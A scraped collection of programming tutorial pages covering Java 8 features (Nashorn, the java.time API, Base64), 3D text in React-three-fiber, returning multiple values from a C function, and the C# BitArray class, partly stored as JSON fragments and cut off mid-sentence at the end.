javax.script.ScriptEngineManager;\nimport javax.script.ScriptEngine;\nimport javax.script.ScriptException;\n\npublic class Java8Tester {\n\n public static void main(String args[]) {\n ScriptEngineManager scriptEngineManager = new ScriptEngineManager();\n ScriptEngine nashorn = scriptEngineManager.getEngineByName(\"nashorn\");\n\t\t\n String name = \"Mahesh\";\n Integer result = null;\n \n try {\n nashorn.eval(\"print('\" + name + \"')\");\n result = (Integer) nashorn.eval(\"10 + 2\");\n \n } catch(ScriptException e) {\n System.out.println(\"Error executing script: \"+ e.getMessage());\n }\n System.out.println(result.toString());\n }\n}" }, { "code": null, "e": 42726, "s": 42674, "text": "Compile the class using javac compiler as follows −" }, { "code": null, "e": 42758, "s": 42726, "text": "C:\\JAVA>javac Java8Tester.java\n" }, { "code": null, "e": 42795, "s": 42758, "text": "Now run the Java8Tester as follows −" }, { "code": null, "e": 42821, "s": 42795, "text": "C:\\JAVA>java Java8Tester\n" }, { "code": null, "e": 42862, "s": 42821, "text": "It should produce the following result −" }, { "code": null, "e": 42873, "s": 42862, "text": "Mahesh\n12\n" }, { "code": null, "e": 42955, "s": 42873, "text": "The following example explains how to import and use Java classes in java script." }, { "code": null, "e": 43002, "s": 42955, "text": "Create and save sample.js in c:\\> JAVA folder." }, { "code": null, "e": 43349, "s": 43002, "text": "var BigDecimal = Java.type('java.math.BigDecimal');\n\nfunction calculate(amount, percentage) {\n\n var result = new BigDecimal(amount).multiply(new BigDecimal(percentage)).divide(\n new BigDecimal(\"100\"), 2, BigDecimal.ROUND_HALF_EVEN);\n \n return result.toPlainString();\n}\nvar result = calculate(568000000000000000023,13.9);\nprint(result);" }, { "code": null, "e": 43397, "s": 43349, "text": "Open the console and use the following command." }, { "code": null, "e": 43420, "s": 43397, "text": "C:\\JAVA>jjs sample.js\n" }, { "code": null, "e": 43461, "s": 43420, "text": "It should produce the following output −" }, { "code": null, "e": 43486, "s": 43461, "text": "78952000000000000003.20\n" }, { "code": null, "e": 43588, "s": 43486, "text": "With Java 8, a new Date-Time API is introduced to cover the following drawbacks of old date-time API." }, { "code": null, "e": 43780, "s": 43588, "text": "Not thread safe − java.util.Date is not thread safe, thus developers have to deal with concurrency issue while using date. The new date-time API is immutable and does not have setter methods." }, { "code": null, "e": 43972, "s": 43780, "text": "Not thread safe − java.util.Date is not thread safe, thus developers have to deal with concurrency issue while using date. The new date-time API is immutable and does not have setter methods." }, { "code": null, "e": 44203, "s": 43972, "text": "Poor design − Default Date starts from 1900, month starts from 1, and day starts from 0, so no uniformity. The old API had less direct methods for date operations. The new API provides numerous utility methods for such operations." }, { "code": null, "e": 44434, "s": 44203, "text": "Poor design − Default Date starts from 1900, month starts from 1, and day starts from 0, so no uniformity. The old API had less direct methods for date operations. The new API provides numerous utility methods for such operations." }, { "code": null, "e": 44604, "s": 44434, "text": "Difficult time zone handling − Developers had to write a lot of code to deal with timezone issues. The new API has been developed keeping domain-specific design in mind." }, { "code": null, "e": 44774, "s": 44604, "text": "Difficult time zone handling − Developers had to write a lot of code to deal with timezone issues. The new API has been developed keeping domain-specific design in mind." }, { "code": null, "e": 44918, "s": 44774, "text": "Java 8 introduces a new date-time API under the package java.time. Following are some of the important classes introduced in java.time package." }, { "code": null, "e": 44992, "s": 44918, "text": "Local − Simplified date-time API with no complexity of timezone handling." }, { "code": null, "e": 45066, "s": 44992, "text": "Local − Simplified date-time API with no complexity of timezone handling." }, { "code": null, "e": 45132, "s": 45066, "text": "Zoned − Specialized date-time API to deal with various timezones." }, { "code": null, "e": 45198, "s": 45132, "text": "Zoned − Specialized date-time API to deal with various timezones." }, { "code": null, "e": 45329, "s": 45198, "text": "LocalDate/LocalTime and LocalDateTime classes simplify the development where timezones are not required. Let's see them in action." }, { "code": null, "e": 45415, "s": 45329, "text": "Create the following java program using any editor of your choice in, say, C:\\> JAVA." }, { "code": null, "e": 46724, "s": 45415, "text": "import java.time.LocalDate;\nimport java.time.LocalTime;\nimport java.time.LocalDateTime;\nimport java.time.Month;\n\npublic class Java8Tester {\n\n public static void main(String args[]) {\n Java8Tester java8tester = new Java8Tester();\n java8tester.testLocalDateTime();\n }\n\t\n public void testLocalDateTime() {\n // Get the current date and time\n LocalDateTime currentTime = LocalDateTime.now();\n System.out.println(\"Current DateTime: \" + currentTime);\n\t\t\n LocalDate date1 = currentTime.toLocalDate();\n System.out.println(\"date1: \" + date1);\n\t\t\n Month month = currentTime.getMonth();\n int day = currentTime.getDayOfMonth();\n int seconds = currentTime.getSecond();\n\t\t\n System.out.println(\"Month: \" + month +\"day: \" + day +\"seconds: \" + seconds);\n\t\t\n LocalDateTime date2 = currentTime.withDayOfMonth(10).withYear(2012);\n System.out.println(\"date2: \" + date2);\n\t\t\n //12 december 2014\n LocalDate date3 = LocalDate.of(2014, Month.DECEMBER, 12);\n System.out.println(\"date3: \" + date3);\n\t\t\n //22 hour 15 minutes\n LocalTime date4 = LocalTime.of(22, 15);\n System.out.println(\"date4: \" + date4);\n\t\t\n //parse a string\n LocalTime date5 = LocalTime.parse(\"20:15:30\");\n System.out.println(\"date5: \" + date5);\n }\n}" }, { "code": null, "e": 46776, "s": 46724, "text": "Compile the class using javac compiler as follows −" }, { "code": null, "e": 46808, "s": 46776, "text": "C:\\JAVA>javac Java8Tester.java\n" }, { "code": null, "e": 46845, "s": 46808, "text": "Now run the Java8Tester as follows −" }, { "code": null, "e": 46871, "s": 46845, "text": "C:\\JAVA>java Java8Tester\n" }, { "code": null, "e": 46912, "s": 46871, "text": "It should produce the following output −" }, { "code": null, "e": 47084, "s": 46912, "text": "Current DateTime: 2014-12-09T11:00:45.457\ndate1: 2014-12-09\nMonth: DECEMBERday: 9seconds: 45\ndate2: 2012-12-10T11:00:45.457\ndate3: 2014-12-12\ndate4: 22:15\ndate5: 20:15:30\n" }, { "code": null, "e": 47181, "s": 47084, "text": "Zoned date-time API is to be used when time zone is to be considered. Let us see them in action." }, { "code": null, "e": 47267, "s": 47181, "text": "Create the following Java program using any editor of your choice in, say, C:\\> JAVA." }, { "code": null, "e": 47916, "s": 47267, "text": "import java.time.ZonedDateTime;\nimport java.time.ZoneId;\n\npublic class Java8Tester {\n\n public static void main(String args[]) {\n Java8Tester java8tester = new Java8Tester();\n java8tester.testZonedDateTime();\n }\n\t\n public void testZonedDateTime() {\n // Get the current date and time\n ZonedDateTime date1 = ZonedDateTime.parse(\"2007-12-03T10:15:30+05:30[Asia/Karachi]\");\n System.out.println(\"date1: \" + date1);\n\t\t\n ZoneId id = ZoneId.of(\"Europe/Paris\");\n System.out.println(\"ZoneId: \" + id);\n\t\t\n ZoneId currentZone = ZoneId.systemDefault();\n System.out.println(\"CurrentZone: \" + currentZone);\n }\n}" }, { "code": null, "e": 47968, "s": 47916, "text": "Compile the class using javac compiler as follows −" }, { "code": null, "e": 48000, "s": 47968, "text": "C:\\JAVA>javac Java8Tester.java\n" }, { "code": null, "e": 48037, "s": 48000, "text": "Now run the Java8Tester as follows −" }, { "code": null, "e": 48063, "s": 48037, "text": "C:\\JAVA>java Java8Tester\n" }, { "code": null, "e": 48104, "s": 48063, "text": "It should produce the following output −" }, { "code": null, "e": 48194, "s": 48104, "text": "date1: 2007-12-03T10:15:30+05:00[Asia/Karachi]\nZoneId: Europe/Paris\nCurrentZone: Etc/UTC\n" }, { "code": null, "e": 48351, "s": 48194, "text": "java.time.temporal.ChronoUnit enum is added in Java 8 to replace the integer values used in old API to represent day, month, etc. Let us see them in action." }, { "code": null, "e": 48437, "s": 48351, "text": "Create the following Java program using any editor of your choice in, say, C:\\> JAVA." }, { "code": null, "e": 49474, "s": 48437, "text": "import java.time.LocalDate;\nimport java.time.temporal.ChronoUnit;\n\npublic class Java8Tester {\n\n public static void main(String args[]) {\n Java8Tester java8tester = new Java8Tester();\n java8tester.testChromoUnits();\n }\n\t\n public void testChromoUnits() {\n //Get the current date\n LocalDate today = LocalDate.now();\n System.out.println(\"Current date: \" + today);\n\t\t\n //add 1 week to the current date\n LocalDate nextWeek = today.plus(1, ChronoUnit.WEEKS);\n System.out.println(\"Next week: \" + nextWeek);\n\t\t\n //add 1 month to the current date\n LocalDate nextMonth = today.plus(1, ChronoUnit.MONTHS);\n System.out.println(\"Next month: \" + nextMonth);\n\t\t\n //add 1 year to the current date\n LocalDate nextYear = today.plus(1, ChronoUnit.YEARS);\n System.out.println(\"Next year: \" + nextYear);\n\t\t\n //add 10 years to the current date\n LocalDate nextDecade = today.plus(1, ChronoUnit.DECADES);\n System.out.println(\"Date after ten year: \" + nextDecade);\n }\n}" }, { "code": null, "e": 49526, "s": 49474, "text": "Compile the class using javac compiler as follows −" }, { "code": null, "e": 49558, "s": 49526, "text": "C:\\JAVA>javac Java8Tester.java\n" }, { "code": null, "e": 49595, "s": 49558, "text": "Now run the Java8Tester as follows −" }, { "code": null, "e": 49621, "s": 49595, "text": "C:\\JAVA>java Java8Tester\n" }, { "code": null, "e": 49662, "s": 49621, "text": "It should produce the following result −" }, { "code": null, "e": 49787, "s": 49662, "text": "Current date: 2014-12-10\nNext week: 2014-12-17\nNext month: 2015-01-10\nNext year: 2015-12-10\nDate after ten year: 2024-12-10\n" }, { "code": null, "e": 49874, "s": 49787, "text": "With Java 8, two specialized classes are introduced to deal with the time differences." }, { "code": null, "e": 49924, "s": 49874, "text": "Period − It deals with date based amount of time." }, { "code": null, "e": 49974, "s": 49924, "text": "Period − It deals with date based amount of time." }, { "code": null, "e": 50026, "s": 49974, "text": "Duration − It deals with time based amount of time." }, { "code": null, "e": 50078, "s": 50026, "text": "Duration − It deals with time based amount of time." }, { "code": null, "e": 50105, "s": 50078, "text": "Let us see them in action." }, { "code": null, "e": 50191, "s": 50105, "text": "Create the following Java program using any editor of your choice in, say, C:\\> JAVA." }, { "code": null, "e": 51239, "s": 50191, "text": "import java.time.temporal.ChronoUnit;\n\nimport java.time.LocalDate;\nimport java.time.LocalTime;\nimport java.time.Duration;\nimport java.time.Period;\n\npublic class Java8Tester {\n\n public static void main(String args[]) {\n Java8Tester java8tester = new Java8Tester();\n java8tester.testPeriod();\n java8tester.testDuration();\n }\n\t\n public void testPeriod() {\n //Get the current date\n LocalDate date1 = LocalDate.now();\n System.out.println(\"Current date: \" + date1);\n\t\t\n //add 1 month to the current date\n LocalDate date2 = date1.plus(1, ChronoUnit.MONTHS);\n System.out.println(\"Next month: \" + date2);\n \n Period period = Period.between(date2, date1);\n System.out.println(\"Period: \" + period);\n }\n\t\n public void testDuration() {\n LocalTime time1 = LocalTime.now();\n Duration twoHours = Duration.ofHours(2);\n\t\t\n LocalTime time2 = time1.plus(twoHours);\n Duration duration = Duration.between(time1, time2);\n\t\t\n System.out.println(\"Duration: \" + duration);\n }\n}" }, { "code": null, "e": 51291, "s": 51239, "text": "Compile the class using javac compiler as follows −" }, { "code": null, "e": 51323, "s": 51291, "text": "C:\\JAVA>javac Java8Tester.java\n" }, { "code": null, "e": 51360, "s": 51323, "text": "Now run the Java8Tester as follows −" }, { "code": null, "e": 51386, "s": 51360, "text": "C:\\JAVA>java Java8Tester\n" }, { "code": null, "e": 51427, "s": 51386, "text": "It should produce the following output −" }, { "code": null, "e": 51504, "s": 51427, "text": "Current date: 2014-12-10\nNext month: 2015-01-10\nPeriod: P-1M\nDuration: PT2H\n" }, { "code": null, "e": 51660, "s": 51504, "text": "TemporalAdjuster is used to perform the date mathematics. For example, get the \"Second Saturday of the Month\" or \"Next Tuesday\". Let us see them in action." }, { "code": null, "e": 51746, "s": 51660, "text": "Create the following Java program using any editor of your choice in, say, C:\\> JAVA." }, { "code": null, "e": 52712, "s": 51746, "text": "import java.time.LocalDate;\nimport java.time.temporal.TemporalAdjusters;\nimport java.time.DayOfWeek;\n\npublic class Java8Tester {\n\n public static void main(String args[]) {\n Java8Tester java8tester = new Java8Tester();\n java8tester.testAdjusters();\n }\n\t\n public void testAdjusters() {\n //Get the current date\n LocalDate date1 = LocalDate.now();\n System.out.println(\"Current date: \" + date1);\n\t\t\n //get the next tuesday\n LocalDate nextTuesday = date1.with(TemporalAdjusters.next(DayOfWeek.TUESDAY));\n System.out.println(\"Next Tuesday on : \" + nextTuesday);\n\t\t\n //get the second saturday of next month\n LocalDate firstInYear = LocalDate.of(date1.getYear(),date1.getMonth(), 1);\n LocalDate secondSaturday = firstInYear.with(TemporalAdjusters.nextOrSame(\n DayOfWeek.SATURDAY)).with(TemporalAdjusters.next(DayOfWeek.SATURDAY));\n System.out.println(\"Second Saturday on : \" + secondSaturday);\n }\n}" }, { "code": null, "e": 52764, "s": 52712, "text": "Compile the class using javac compiler as follows −" }, { "code": null, "e": 52796, "s": 52764, "text": "C:\\JAVA>javac Java8Tester.java\n" }, { "code": null, "e": 52833, "s": 52796, "text": "Now run the Java8Tester as follows −" }, { "code": null, "e": 52859, "s": 52833, "text": "C:\\JAVA>java Java8Tester\n" }, { "code": null, "e": 52900, "s": 52859, "text": "It should produce the following result −" }, { "code": null, "e": 52987, "s": 52900, "text": "Current date: 2014-12-10\nNext Tuesday on : 2014-12-16\nSecond Saturday on : 2014-12-13\n" }, { "code": null, "e": 53234, "s": 52987, "text": "A toInstant() method is added to the original Date and Calendar objects, which can be used to convert them to the new Date-Time API. Use an ofInstant(Insant,ZoneId) method to get a LocalDateTime or ZonedDateTime object. Let us see them in action." }, { "code": null, "e": 53320, "s": 53234, "text": "Create the following Java program using any editor of your choice in, say, C:\\> JAVA." }, { "code": null, "e": 54258, "s": 53320, "text": "import java.time.LocalDateTime;\nimport java.time.ZonedDateTime;\n\nimport java.util.Date;\n\nimport java.time.Instant;\nimport java.time.ZoneId;\n\npublic class Java8Tester {\n\n public static void main(String args[]) {\n Java8Tester java8tester = new Java8Tester();\n java8tester.testBackwardCompatability();\n }\n\t\n public void testBackwardCompatability() {\n //Get the current date\n Date currentDate = new Date();\n System.out.println(\"Current date: \" + currentDate);\n\t\t\n //Get the instant of current date in terms of milliseconds\n Instant now = currentDate.toInstant();\n ZoneId currentZone = ZoneId.systemDefault();\n\t\t\n LocalDateTime localDateTime = LocalDateTime.ofInstant(now, currentZone);\n System.out.println(\"Local date: \" + localDateTime);\n\t\t\n ZonedDateTime zonedDateTime = ZonedDateTime.ofInstant(now, currentZone);\n System.out.println(\"Zoned date: \" + zonedDateTime);\n }\n}" }, { "code": null, "e": 54310, "s": 54258, "text": "Compile the class using javac compiler as follows −" }, { "code": null, "e": 54342, "s": 54310, "text": "C:\\JAVA>javac Java8Tester.java\n" }, { "code": null, "e": 54379, "s": 54342, "text": "Now run the Java8Tester as follows −" }, { "code": null, "e": 54405, "s": 54379, "text": "C:\\JAVA>java Java8Tester\n" }, { "code": null, "e": 54446, "s": 54405, "text": "It should produce the following output −" }, { "code": null, "e": 54572, "s": 54446, "text": "Current date: Wed Dec 10 05:44:06 UTC 2014\nLocal date: 2014-12-10T05:44:06.635\nZoned date: 2014-12-10T05:44:06.635Z[Etc/UTC]\n" }, { "code": null, "e": 54735, "s": 54572, "text": "With Java 8, Base64 has finally got its due. Java 8 now has inbuilt encoder and decoder for Base64 encoding. In Java 8, we can use three types of Base64 encoding." }, { "code": null, "e": 54918, "s": 54735, "text": "Simple − Output is mapped to a set of characters lying in A-Za-z0-9+/. The encoder does not add any line feed in output, and the decoder rejects any character other than A-Za-z0-9+/." }, { "code": null, "e": 55101, "s": 54918, "text": "Simple − Output is mapped to a set of characters lying in A-Za-z0-9+/. The encoder does not add any line feed in output, and the decoder rejects any character other than A-Za-z0-9+/." }, { "code": null, "e": 55200, "s": 55101, "text": "URL − Output is mapped to set of characters lying in A-Za-z0-9+_. Output is URL and filename safe." }, { "code": null, "e": 55299, "s": 55200, "text": "URL − Output is mapped to set of characters lying in A-Za-z0-9+_. Output is URL and filename safe." }, { "code": null, "e": 55561, "s": 55299, "text": "MIME − Output is mapped to MIME friendly format. Output is represented in lines of no more than 76 characters each, and uses a carriage return '\\r' followed by a linefeed '\\n' as the line separator. No line separator is present to the end of the encoded output." }, { "code": null, "e": 55823, "s": 55561, "text": "MIME − Output is mapped to MIME friendly format. Output is represented in lines of no more than 76 characters each, and uses a carriage return '\\r' followed by a linefeed '\\n' as the line separator. No line separator is present to the end of the encoded output." }, { "code": null, "e": 55851, "s": 55823, "text": "static class Base64.Decoder" }, { "code": null, "e": 55978, "s": 55851, "text": "This class implements a decoder for decoding byte data using the Base64 encoding scheme as specified in RFC 4648 and RFC 2045." }, { "code": null, "e": 56006, "s": 55978, "text": "static class Base64.Encoder" }, { "code": null, "e": 56134, "s": 56006, "text": "This class implements an encoder for encoding byte data using the Base64 encoding scheme as specified in RFC 4648 and RFC 2045." }, { "code": null, "e": 56169, "s": 56134, "text": "static Base64.Decoder getDecoder()" }, { "code": null, "e": 56252, "s": 56169, "text": "Returns a Base64.Decoder that decodes using the Basic type base64 encoding scheme." }, { "code": null, "e": 56287, "s": 56252, "text": "static Base64.Encoder getEncoder()" }, { "code": null, "e": 56370, "s": 56287, "text": "Returns a Base64.Encoder that encodes using the Basic type base64 encoding scheme." }, { "code": null, "e": 56409, "s": 56370, "text": "static Base64.Decoder getMimeDecoder()" }, { "code": null, "e": 56491, "s": 56409, "text": "Returns a Base64.Decoder that decodes using the MIME type base64 decoding scheme." }, { "code": null, "e": 56530, "s": 56491, "text": "static Base64.Encoder getMimeEncoder()" }, { "code": null, "e": 56612, "s": 56530, "text": "Returns a Base64.Encoder that encodes using the MIME type base64 encoding scheme." }, { "code": null, "e": 56687, "s": 56612, "text": "static Base64.Encoder getMimeEncoder(int lineLength, byte[] lineSeparator)" }, { "code": null, "e": 56816, "s": 56687, "text": "Returns a Base64.Encoder that encodes using the MIME type base64 encoding scheme with specified line length and line separators." }, { "code": null, "e": 56854, "s": 56816, "text": "static Base64.Decoder getUrlDecoder()" }, { "code": null, "e": 56953, "s": 56854, "text": "Returns a Base64.Decoder that decodes using the URL and Filename safe type base64 encoding scheme." }, { "code": null, "e": 56991, "s": 56953, "text": "static Base64.Encoder getUrlEncoder()" }, { "code": null, "e": 57090, "s": 56991, "text": "Returns a Base64.Encoder that encodes using the URL and Filename safe type base64 encoding scheme." }, { "code": null, "e": 57145, "s": 57090, "text": "This class inherits methods from the following class −" }, { "code": null, "e": 57162, "s": 57145, "text": "java.lang.Object" }, { "code": null, "e": 57246, "s": 57162, "text": "Create the following Java program using any editor of your choice in say C:/> JAVA." }, { "code": null, "e": 58640, "s": 57246, "text": "import java.util.Base64;\nimport java.util.UUID;\nimport java.io.UnsupportedEncodingException;\n\npublic class HelloWorld {\n\n public static void main(String args[]) {\n\n try {\n\t\t\n // Encode using basic encoder\n String base64encodedString = Base64.getEncoder().encodeToString(\n \"TutorialsPoint?java8\".getBytes(\"utf-8\"));\n System.out.println(\"Base64 Encoded String (Basic) :\" + base64encodedString);\n\t\t\n // Decode\n byte[] base64decodedBytes = Base64.getDecoder().decode(base64encodedString);\n\t\t\n System.out.println(\"Original String: \" + new String(base64decodedBytes, \"utf-8\"));\n base64encodedString = Base64.getUrlEncoder().encodeToString(\n \"TutorialsPoint?java8\".getBytes(\"utf-8\"));\n System.out.println(\"Base64 Encoded String (URL) :\" + base64encodedString);\n\t\t\n StringBuilder stringBuilder = new StringBuilder();\n\t\t\n for (int i = 0; i < 10; ++i) {\n stringBuilder.append(UUID.randomUUID().toString());\n }\n\t\t\n byte[] mimeBytes = stringBuilder.toString().getBytes(\"utf-8\");\n String mimeEncodedString = Base64.getMimeEncoder().encodeToString(mimeBytes);\n System.out.println(\"Base64 Encoded String (MIME) :\" + mimeEncodedString);\n\n } catch(UnsupportedEncodingException e) {\n System.out.println(\"Error :\" + e.getMessage());\n }\n }\n}" }, { "code": null, "e": 58692, "s": 58640, "text": "Compile the class using javac compiler as follows −" }, { "code": null, "e": 58724, "s": 58692, "text": "C:\\JAVA>javac Java8Tester.java\n" }, { "code": null, "e": 58761, "s": 58724, "text": "Now run the Java8Tester as follows −" }, { "code": null, "e": 58787, "s": 58761, "text": "C:\\JAVA>java Java8Tester\n" }, { "code": null, "e": 58828, "s": 58787, "text": "It should produce the following output −" }, { "code": null, "e": 59502, "s": 58828, "text": "Base64 Encoded String (Basic) :VHV0b3JpYWxzUG9pbnQ/amF2YTg=\nOriginal String: TutorialsPoint?java8\nBase64 Encoded String (URL) :VHV0b3JpYWxzUG9pbnQ_amF2YTg=\nBase64 Encoded String (MIME) :YmU3NWY2ODktNGM5YS00ODlmLWI2MTUtZTVkOTk2YzQ1Njk1Y2EwZTg2OTEtMmRiZC00YTQ1LWJl\nNTctMTI1MWUwMTk0ZWQyNDE0NDAwYjgtYTYxOS00NDY5LTllYTctNjc1YzE3YWJhZTk1MTQ2MDQz\nNDItOTAyOC00ZWI0LThlOTYtZWU5YzcwNWQyYzVhMTQxMWRjYTMtY2MwNi00MzU0LTg0MTgtNGQ1\nMDkwYjdiMzg2ZTY0OWU5MmUtZmNkYS00YWEwLTg0MjQtYThiOTQxNDQ2YzhhNTVhYWExZjItNjU2\nMi00YmM4LTk2ZGYtMDE4YmY5ZDZhMjkwMzM3MWUzNDMtMmQ3MS00MDczLWI0Y2UtMTQxODE0MGU5\nYjdmYTVlODUxYzItN2NmOS00N2UyLWIyODQtMThlMWVkYTY4M2Q1YjE3YTMyYmItZjllMS00MTFk\nLWJiM2UtM2JhYzUxYzI5OWI4\n" }, { "code": null, "e": 59535, "s": 59502, "text": "\n 16 Lectures \n 2 hours \n" }, { "code": null, "e": 59551, "s": 59535, "text": " Malhar Lathkar" }, { "code": null, "e": 59584, "s": 59551, "text": "\n 19 Lectures \n 5 hours \n" }, { "code": null, "e": 59600, "s": 59584, "text": " Malhar Lathkar" }, { "code": null, "e": 59635, "s": 59600, "text": "\n 25 Lectures \n 2.5 hours \n" }, { "code": null, "e": 59649, "s": 59635, "text": " Anadi Sharma" }, { "code": null, "e": 59683, "s": 59649, "text": "\n 126 Lectures \n 7 hours \n" }, { "code": null, "e": 59697, "s": 59683, "text": " Tushar Kale" }, { "code": null, "e": 59734, "s": 59697, "text": "\n 119 Lectures \n 17.5 hours \n" }, { "code": null, "e": 59749, "s": 59734, "text": " Monica Mittal" }, { "code": null, "e": 59782, "s": 59749, "text": "\n 76 Lectures \n 7 hours \n" }, { "code": null, "e": 59801, "s": 59782, "text": " Arnab Chakraborty" }, { "code": null, "e": 59808, "s": 59801, "text": " Print" }, { "code": null, "e": 59819, "s": 59808, "text": " Add Notes" } ]
Creating 3D Text using React-three-fiber
In this article, we will see how to create a 3D text using react-threefiber. We will first download the font of JSON and then we will add it in our Text Geometry object. We will add orbit control to it which will allow moving the text on the screen and view the 3D text properly. So, let's get started. First, download important libraries − npm i --save @react-three/fiber three This library react-three/fiber will be used to add webGL renderer to the website and to connect threejs and React. Now install a typeface font JSON and put it inside “src” folder. You can download a font from google fonts and go to https://gero3.github.io/facetype.js/ for converting it into JSON. Add the following lines of code in App.js − import React, { useEffect, useRef } from "react"; import { Canvas, useThree ,useLoader } from "@reactthree/fiber"; import { OrbitControls } from "three/examples/jsm/controls/OrbitControls"; import * as THREE from "three"; import Roboto from "./Roboto_Regular.json" import "./App.css"; const CameraController = () => { const { camera, gl } = useThree(); useEffect( () => { const controls = new OrbitControls(camera, gl.domElement); controls.minDistance = 3; controls.maxDistance = 20; return () => { controls.dispose(); }; }, [camera, gl] ); return null; }; function Text3d(){ const font = new THREE.FontLoader().parse(Roboto); const textOptions = { font, size: 5, height: 1 }; return ( <mesh> <textGeometry attach='geometry' args={['three.js', text Options]} /> <meshStandardMaterial attach='material' color="hotpink" /> </mesh> ) } export default function App(){ return ( <Canvas> <CameraController/> <ambientLight /> <Text3d/> </Canvas> ); }; We first loaded the JSON font with “Roboto” variable and then inside our function, we parsed it as a font and stored it in “font” const. Then we set its styles and other aspects in “textOptions”. Next we simply created textGeometry and passed args, and material object is used to apply styles. It will produce the following output − Your browser does not support HTML5 video.
[ { "code": null, "e": 1365, "s": 1062, "text": "In this article, we will see how to create a 3D text using react-threefiber. We will first download the font of JSON and then we will add it in our Text Geometry object. We will add orbit control to it which will allow moving the text on the screen and view the 3D text properly. So, let's get started." }, { "code": null, "e": 1403, "s": 1365, "text": "First, download important libraries −" }, { "code": null, "e": 1441, "s": 1403, "text": "npm i --save @react-three/fiber three" }, { "code": null, "e": 1556, "s": 1441, "text": "This library react-three/fiber will be used to add webGL renderer to the website and to connect threejs and React." }, { "code": null, "e": 1739, "s": 1556, "text": "Now install a typeface font JSON and put it inside “src” folder. You can download a font from google fonts and go to https://gero3.github.io/facetype.js/ for converting it into JSON." }, { "code": null, "e": 1783, "s": 1739, "text": "Add the following lines of code in App.js −" }, { "code": null, "e": 2926, "s": 1783, "text": "import React, { useEffect, useRef } from \"react\";\nimport { Canvas, useThree ,useLoader } from \"@reactthree/fiber\";\nimport { OrbitControls } from \"three/examples/jsm/controls/OrbitControls\";\nimport * as THREE from \"three\";\nimport Roboto from \"./Roboto_Regular.json\"\nimport \"./App.css\";\n\nconst CameraController = () => {\n const { camera, gl } = useThree();\n useEffect(\n () => {\n const controls = new OrbitControls(camera, gl.domElement);\n controls.minDistance = 3;\n controls.maxDistance = 20;\n return () => {\n controls.dispose();\n };\n },\n [camera, gl]\n );\n return null;\n};\nfunction Text3d(){\n const font = new THREE.FontLoader().parse(Roboto);\n const textOptions = {\n font,\n size: 5,\n height: 1\n };\n return (\n <mesh>\n <textGeometry attach='geometry' args={['three.js', text Options]} />\n <meshStandardMaterial attach='material' color=\"hotpink\" />\n </mesh>\n )\n}\nexport default function App(){\n return (\n <Canvas>\n <CameraController/>\n <ambientLight />\n <Text3d/>\n </Canvas>\n );\n};" }, { "code": null, "e": 3063, "s": 2926, "text": "We first loaded the JSON font with “Roboto” variable and then inside our function, we parsed it as a font and stored it in “font” const." }, { "code": null, "e": 3220, "s": 3063, "text": "Then we set its styles and other aspects in “textOptions”. Next we simply created textGeometry and passed args, and material object is used to apply styles." }, { "code": null, "e": 3259, "s": 3220, "text": "It will produce the following output −" }, { "code": null, "e": 3302, "s": 3259, "text": "Your browser does not support HTML5 video." } ]
How can we return multiple values from a function in C/C++?
In C or C++, we cannot return multiple values from a function directly. In this section, we will see how to use some trick to return more than one value from a function. We can return more than one values from a function by using the method called “call by address”, or “call by reference”. In the invoker function, we will use two variables to store the results, and the function will take pointer type data. So we have to pass the address of the data. In this example, we will see how to define a function that can return quotient and remainder after dividing two numbers from one single function. #include<stdio.h> void div(int a, int b, int *quotient, int *remainder) { *quotient = a / b; *remainder = a % b; } main() { int a = 76, b = 10; int q, r; div(a, b, &q, &r); printf("Quotient is: %d\nRemainder is: %d\n", q, r); } Quotient is: 7 Remainder is: 6
[ { "code": null, "e": 1232, "s": 1062, "text": "In C or C++, we cannot return multiple values from a function directly. In this section, we will see how to use some trick to return more than one value from a function." }, { "code": null, "e": 1516, "s": 1232, "text": "We can return more than one values from a function by using the method called “call by address”, or “call by reference”. In the invoker function, we will use two variables to store the results, and the function will take pointer type data. So we have to pass the address of the data." }, { "code": null, "e": 1662, "s": 1516, "text": "In this example, we will see how to define a function that can return quotient and remainder after dividing two numbers from one single function." }, { "code": null, "e": 1908, "s": 1662, "text": "#include<stdio.h>\nvoid div(int a, int b, int *quotient, int *remainder) {\n *quotient = a / b;\n *remainder = a % b;\n}\nmain() {\n int a = 76, b = 10;\n int q, r;\n div(a, b, &q, &r);\n printf(\"Quotient is: %d\\nRemainder is: %d\\n\", q, r);\n}" }, { "code": null, "e": 1939, "s": 1908, "text": "Quotient is: 7\nRemainder is: 6" } ]
C# - BitArray Class
The BitArray class manages a compact array of bit values, which are represented as Booleans, where true indicates that the bit is on (1) and false indicates the bit is off (0). It is used when you need to store the bits but do not know the number of bits in advance. You can access items from the BitArray collection by using an integer index, which starts from zero. The following table lists some of the commonly used properties of the BitArray class − Count Gets the number of elements contained in the BitArray. IsReadOnly Gets a value indicating whether the BitArray is read-only. Item Gets or sets the value of the bit at a specific position in the BitArray. Length Gets or sets the number of elements in the BitArray. The following table lists some of the commonly used methods of the BitArray class − public BitArray And(BitArray value); Performs the bitwise AND operation on the elements in the current BitArray against the corresponding elements in the specified BitArray. public bool Get(int index); Gets the value of the bit at a specific position in the BitArray. public BitArray Not(); Inverts all the bit values in the current BitArray, so that elements set to true are changed to false, and elements set to false are changed to true. public BitArray Or(BitArray value); Performs the bitwise OR operation on the elements in the current BitArray against the corresponding elements in the specified BitArray. public void Set(int index, bool value); Sets the bit at a specific position in the BitArray to the specified value. public void SetAll(bool value); Sets all bits in the BitArray to the specified value. public BitArray Xor(BitArray value); Performs the bitwise eXclusive OR operation on the elements in the current BitArray against the corresponding elements in the specified BitArray. The following example demonstrates the use of BitArray class − using System; using System.Collections; namespace CollectionsApplication { class Program { static void Main(string[] args) { //creating two bit arrays of size 8 BitArray ba1 = new BitArray(8); BitArray ba2 = new BitArray(8); byte[] a = { 60 }; byte[] b = { 13 }; //storing the values 60, and 13 into the bit arrays ba1 = new BitArray(a); ba2 = new BitArray(b); //content of ba1 Console.WriteLine("Bit array ba1: 60"); for (int i = 0; i < ba1.Count; i++) { Console.Write("{0, -6} ", ba1[i]); } Console.WriteLine(); //content of ba2 Console.WriteLine("Bit array ba2: 13"); for (int i = 0; i < ba2.Count; i++) { Console.Write("{0, -6} ", ba2[i]); } Console.WriteLine(); BitArray ba3 = new BitArray(8); ba3 = ba1.And(ba2); //content of ba3 Console.WriteLine("Bit array ba3 after AND operation: 12"); for (int i = 0; i < ba3.Count; i++) { Console.Write("{0, -6} ", ba3[i]); } Console.WriteLine(); ba3 = ba1.Or(ba2); //content of ba3 Console.WriteLine("Bit array ba3 after OR operation: 61"); for (int i = 0; i < ba3.Count; i++) { Console.Write("{0, -6} ", ba3[i]); } Console.WriteLine(); Console.ReadKey(); } } } When the above code is 